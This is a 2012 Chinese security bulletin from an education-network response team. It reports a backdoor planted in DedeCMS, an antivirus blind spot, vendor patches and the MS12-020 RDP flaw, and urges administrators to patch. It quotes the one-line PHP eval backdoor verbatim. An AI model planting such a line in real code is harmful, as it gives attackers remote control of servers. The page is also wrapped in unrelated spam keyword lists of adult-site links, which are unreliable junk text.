999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

內(nèi)容管理系統(tǒng)曝“一句話”后門

2012-11-09 06:41:08鄭先偉
中國教育網(wǎng)絡(luò) 2012年4期
關(guān)鍵詞:程序系統(tǒng)

文/鄭先偉

內(nèi)容管理系統(tǒng)曝“一句話”后門

文/鄭先偉

3月是開學(xué)的第一個月,教育網(wǎng)整體運行平穩(wěn),未發(fā)生影響嚴(yán)重的安全事件,不過,開學(xué)后安全投訴事件的數(shù)量較寒假期間有了較大的增長。

CMS存在后門程序影響服務(wù)器安全

值得關(guān)注的是一個名叫DedeCMS(中文名:織夢)的免費開源CMS系統(tǒng)傳出被放置了“一句話”后門程序。黑客在該系統(tǒng)某些版本中的shopcar.class.php文件中植入一句后門代碼“@eval(file_get_contents('php://input'));”。利用這個被插入了代碼的網(wǎng)頁,黑客只需要遠程構(gòu)造簡單的數(shù)據(jù)包并提交給服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell,再向服務(wù)器上傳PHP木馬程序,就有可能完全控制相關(guān)的服務(wù)器。從目前我們掌握的情況看,有不少學(xué)校的網(wǎng)站是使用這款免費的系統(tǒng)搭建的,黑客通過搜索引擎很容易定位出有問題的網(wǎng)站地址。我們建議使用開源CMS系統(tǒng)搭建網(wǎng)站的管理員應(yīng)該盡快修改升級自己網(wǎng)站的代碼,或者使用一些其他的防護手段(如使用專用的Web防火墻等)進行防護。

多款殺毒軟件存在查殺真空區(qū)

近期沒有新增危害特別嚴(yán)重的木馬病毒程序。值得注意的是多款殺毒軟件被曝出存在查殺真空區(qū),原因是這些殺毒軟件所用的查殺引擎為了提高掃描速度對一些特定格式文件中的某些字段做了標(biāo)志,當(dāng)掃描到有這些特殊標(biāo)志的文件時就認(rèn)為是系統(tǒng)的合法文件而不進行掃描,這就導(dǎo)致如果病毒也采用這種格式并且在特定字段上也放置相應(yīng)的標(biāo)志就能成功地躲過殺毒軟件的查殺。目前國內(nèi)國外的多款殺毒軟件都發(fā)現(xiàn)存在類似的問題,建議用戶隨時關(guān)注軟件版本的更新。

近期新增嚴(yán)重漏洞評述

微軟3月份發(fā)布6個安全公告,其中一個為嚴(yán)重等級,4個為重要等級,1個為中等等級,共修復(fù)了Windows操作系統(tǒng)、Visual Studio開發(fā)工具和Expression Design繪圖編輯工具等多個產(chǎn)品中存在的7處安全漏洞,用戶應(yīng)該盡快使用系統(tǒng)自帶的更新功能安裝相應(yīng)的補丁程序。

瀏覽器方面,Google的Chrome瀏覽器發(fā)布最新版本17.0.963.83,修補之前版本中的多個安全漏洞(http://www.google.cn/chrome/)。Mozilla公司發(fā)布Firefox瀏覽器的安全補丁更新,修補之前版本中的多個安全漏洞(https://www.mozilla.org/security/announce/2012/mfsa2012-19.html)。使用上述瀏覽器的用戶應(yīng)盡快使用軟件自帶的安全更新功能進行升級。

瀏覽器插件方面,Adobe公司發(fā)布了Flash Player的補丁程序,修補之前版本中的兩個遠程代碼執(zhí)行漏洞(http://www.adobe.com/support/security/bulletins/apsb12-05.html)。

Windows遠程桌面協(xié)議RDP遠程代碼執(zhí)行及拒絕服務(wù)攻擊漏洞(MS12-020)

影響系統(tǒng)

Windows XP

Windows 2003

Windows 2008

Windows Vista

Windows 7

漏洞信息

Windows遠程桌面服務(wù)(RDP,Remote Desktop Protocol)是Windows系統(tǒng)自帶的用于提供遠程操作Windows系統(tǒng)的服務(wù),默認(rèn)的服務(wù)端口為3389。

Windows RDP服務(wù)程序在實現(xiàn)上存在錯誤,沒有有效的定義及回收內(nèi)存,導(dǎo)致一些特定的內(nèi)存在釋放后沒有得到有效回收,攻擊者可以構(gòu)造特定的數(shù)據(jù)覆蓋這些內(nèi)存空間,隨后引用這些內(nèi)存中的指令。成功的遠程攻擊者在未經(jīng)認(rèn)證的情況下往服務(wù)器發(fā)送畸形惡意的數(shù)據(jù)包,便可以以系統(tǒng)權(quán)限或者NET SERVICE權(quán)限執(zhí)行任意命令。

漏洞危害

這個漏洞是近年來少有的能夠通過網(wǎng)絡(luò)開放端口直接遠程利用的漏洞,它可以被用來進行蠕蟲病毒的傳播。雖然微軟號稱是從秘密渠道獲得漏洞信息,但是提供這些漏洞信息的是一個有名的黑客組織,因此不排除漏洞信息實際已經(jīng)在黑客組織地下流傳。目前互聯(lián)網(wǎng)上已經(jīng)公布該漏洞拒絕服務(wù)攻擊的代碼(測試后能夠?qū)е侣┒粗鳈C藍屏),遠程代碼執(zhí)行的攻擊代碼很可能在近期就會被公布。建議管理員或用戶應(yīng)該盡快安裝相應(yīng)的補丁程序。

解決辦法

目前廠商已經(jīng)針對該漏洞發(fā)布相應(yīng)的安全公告和補丁程序,我們建議用戶盡快安裝相應(yīng)的補丁程序:

http://www.microsoft.com/technet/security/bulletin/MS12-020.asp

(作者單位為中國教育和科研計算機網(wǎng)應(yīng)急響應(yīng)組)

猜你喜歡
程序系統(tǒng)
Smartflower POP 一體式光伏系統(tǒng)
WJ-700無人機系統(tǒng)
ZC系列無人機遙感系統(tǒng)
北京測繪(2020年12期)2020-12-29 01:33:58
基于PowerPC+FPGA顯示系統(tǒng)
試論我國未決羈押程序的立法完善
半沸制皂系統(tǒng)(下)
失能的信仰——走向衰亡的民事訴訟程序
“程序猿”的生活什么樣
連通與提升系統(tǒng)的最后一塊拼圖 Audiolab 傲立 M-DAC mini
英國與歐盟正式啟動“離婚”程序程序
主站蜘蛛池模板: 国产超碰在线观看| 欧美午夜网站| 日本尹人综合香蕉在线观看| 午夜不卡视频| 国产精品一线天| 日韩无码视频专区| 91丝袜乱伦| 操美女免费网站| 成人午夜视频免费看欧美| 国产在线一二三区| 精品欧美日韩国产日漫一区不卡| 色国产视频| 精品人妻无码区在线视频| 伊人久久综在合线亚洲91| 久久精品无码一区二区国产区| 久久一本日韩精品中文字幕屁孩| 午夜限制老子影院888| 久草国产在线观看| 国产免费一级精品视频 | 91免费国产高清观看| 国产91精品最新在线播放| 成人91在线| 日本午夜在线视频| 在线看国产精品| 国产三区二区| 欧美成人看片一区二区三区 | 色偷偷综合网| 国产喷水视频| 亚洲午夜福利在线| 国产sm重味一区二区三区| 98超碰在线观看| 国产伦片中文免费观看| 免费人成视网站在线不卡| 亚洲精品777| 麻豆精品在线| 免费播放毛片| 久久精品视频亚洲| 免费看av在线网站网址| 国产午夜一级淫片| 又黄又爽视频好爽视频| 亚洲无码高清一区| 另类重口100页在线播放| 97超碰精品成人国产| 美女被操黄色视频网站| 亚洲成人一区在线| 成人免费视频一区二区三区 | 久久无码av三级| 国产一二视频| 99久久这里只精品麻豆| 日韩成人免费网站| 欧美日韩中文国产| 国产国拍精品视频免费看| 福利在线不卡| 欧美一区精品| 狠狠综合久久久久综| 国产十八禁在线观看免费| 国产欧美视频一区二区三区| 国产精品一区在线观看你懂的| 精品成人一区二区三区电影| 永久免费无码成人网站| 国产一区亚洲一区| 在线国产毛片| 中文字幕有乳无码| 国产偷国产偷在线高清| 福利片91| 91小视频在线| 国产一线在线| 日韩亚洲综合在线| 中文字幕首页系列人妻| 国产成人精品一区二区不卡| 国产日本一线在线观看免费| 午夜国产理论| 亚洲人精品亚洲人成在线| 亚洲精品在线91| 国产麻豆精品手机在线观看| 91在线免费公开视频| 青青草原偷拍视频| 亚洲午夜国产片在线观看| 丁香六月激情综合| 无码电影在线观看| 国产成人精品在线| 欧美激情伊人|